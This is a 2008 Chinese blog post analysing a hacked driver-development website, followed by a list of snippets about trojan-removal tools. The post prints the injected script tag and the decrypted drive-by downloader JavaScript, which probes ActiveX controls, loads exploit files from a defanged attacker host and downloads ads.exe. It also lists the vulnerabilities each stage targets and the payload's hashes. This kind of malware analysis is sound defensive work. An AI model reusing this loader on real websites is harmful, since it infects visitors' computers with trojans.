某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
endurer 原创
2008-01-23 第1版
打开该网站,Kaspersky报告:
2008-1-21 14:30:41 恶意 HTTP 对象 <hxxp://list**.ad*s**looks.info/list.js>: 已检测 木马程序 Trojan-Downloader.JS.Small.js.
检查网站首页代码,发现:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://list**.ad*s**looks.info/list.js"></SCRIPT>
---/
可能是该网站服务器所在机房有ARP病毒在做怪。
hxxp://list**.ad*s**looks.info/list.js的代码解密为后为:
/---
if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<script src=hxxp://k***.2*2**2*360.com/6.gif><//script>");if(e!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/1.gif><//script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/2.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/3.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/4.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("<iframe style=display:none src=hxxp://k***.2*2**2*360.com/5.gif></iframe>")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("hxxp://k***.2*2**2*360.com/ads/ads.cab","ads.exe",0);document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}}}<script src=hxxp://k***.2*2**2*360.com/6.gif></script><script src=hxxp://k***.2*2**2*360.com/3.gif></script><DIV style="CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')"></DIV>
---/
1. hxxp://k***.2*2**2*360.com/6.gif 包含利用RealPlayer漏洞利用代码
2. hxxp://k***.2*2**2*360.com/1.gif
Kaspersky 报为 Trojan-Downloader.JS.Small.en,包含 利用 MS06014 漏洞下载 hxxp://k***.2*2**2*360.com/ads/ads.jpg.exe 的 JavaScript 脚本代码
文件说明符 : D:/test/ads.jpg.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-23 13:15:50
修改时间 : 2007-11-23 13:15:50
访问时间 : 2008-1-22 0:0:0
大小 : 6656 字节 6.512 KB
MD5 : f81ce2b0f46ca9ced6558fdadfb45099
SHA1: 90E14F9049B51DF1BF70A8363162C782B321714E
CRC32: d55ccaa9
Kaspersky 报为 Trojan-Downloader.Win32.Small.gkm,感星报为 Trojan.DL.Win32.Small.gkm
3. hxxp://k***.2*2**2*360.com/2.gif
包含 利用暴风影音漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe 的JavaScript 脚本代码
ads.exe 与 ads.jpg.exe 相同
4. hxxp://k***.2*2**2*360.com/ads.c
利用 ANI漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
5 hxxp://k***.2*2**2*360.com/3.gif
包含利用PPStream漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
5. hxxp://k***.2*2**2*360.com/4.gif
包含利用迅雷漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
6. hxxp://k***.2*2**2*360.com/5.gif
Kaspersky报为 Trojan-Downloader.JS.Small.jh
利用联众世界GLChat.ocx 控件漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
7.hxxp://k***.2*2**2*360.com/ads/ads.cab 包含 ads.exe
分享到:
相关推荐
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
2020年trojan最新windows64客户端
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。该木马...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
1、Trojan-Ransom.Win32.Rakhni 2、Trojan-Ransom.Win32.Aura 3、Trojan-Ransom.Win32.Agent.iih 4、Trojan-Ransom.Win32.Autoit 5、Trojan-Ransom.AndroidOS.Pletor (安卓下的勒索软件) 6、Trojan-Ransom.Win32....
js.scob.trojan
trojan
增加5个变种的查杀,分别是Trojan.Win32.Undef.iqd,Trojan.Win32.Undef.pun,Trojan.Win32.Undef.kcq等 文件信息: Size: 148992 bytes File Version: 2.03 Modified: 2008年9月3日, 15:21:22 MD5: 0B85E5AFC3E...
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury...7、Trojan-Ransom.Win32.CryptXXX (目前能解版本1、版本2,版本3)
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
它是:“木马列表下载器变种B(Trojan.DL.Win32.List.b)”病毒。该病毒会在用户的计算机上悄悄运行,并从黑客指定的网站下载“灰鸽子”、“网络游戏木马”、“密西”等多个病毒、木马及其变种。用户计算机一旦感染了...
可查杀最新木马,主要用于查杀Trojan.Malscript!html等易中木马
trojan-qt5 for linux